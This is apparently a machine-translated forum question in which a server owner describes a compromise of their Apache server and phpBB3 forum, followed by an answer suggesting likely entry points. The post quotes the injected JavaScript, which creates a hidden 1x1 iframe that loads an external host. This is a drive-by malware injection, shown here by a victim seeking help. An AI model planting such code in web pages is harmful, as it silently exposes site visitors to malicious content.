服务器攻击,不知道如何

可能重复:
我的服务器被黑了应急
我的服务器被攻击了吗?

我的Apache服务器受到攻击,PHPbb3论坛安装了几个文件,修改后显示一个iFrame。 该攻击插入了一个phpvariables和值,然后解码为JavaScript命令客户端加载一个带有外部内容的iFrame。 此外,我的HEADER.html(头文件的Apache目录浏览)文件被修改和潜在的其他人。

注入的php中使用的variables名称是“$ somecrainsignvar”。 我在网上发现类似的攻击。 我知道也许福州的软件已经过时了,潜在的安全漏洞,或者服务器上的其他部分可能是潜在的漏洞,但是通过htpasswd / htaccess限制所有访问服务器,因此我不明白攻击者/机器人如何能够进行任何更改甚至访问该网站。

任何帮助将不胜感激。 还附加了通过PHP注入的JavaScript代码。

<script type="text/javascript">document.writeln("<body>");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "http://farenta.in/gb/us.php";</script> 

此服务器上是否有其他网站运行? 哪些帐户有权写入networking服务器文件? 这是一个专用服务器还是与其他用户共享?

有很多方法可以完成,其中许多方法根本不涉及网站。 例如,容易猜到/强制性的SSH密码。 看看人们对于“$ somecrainsignvar”问题的一些Googlesearch结果,它看起来并不特定于phpBB或者wordpress,所以很可能你的web服务器本身或者服务器上运行的其他服务中存在一个漏洞,其他人直接写入文件。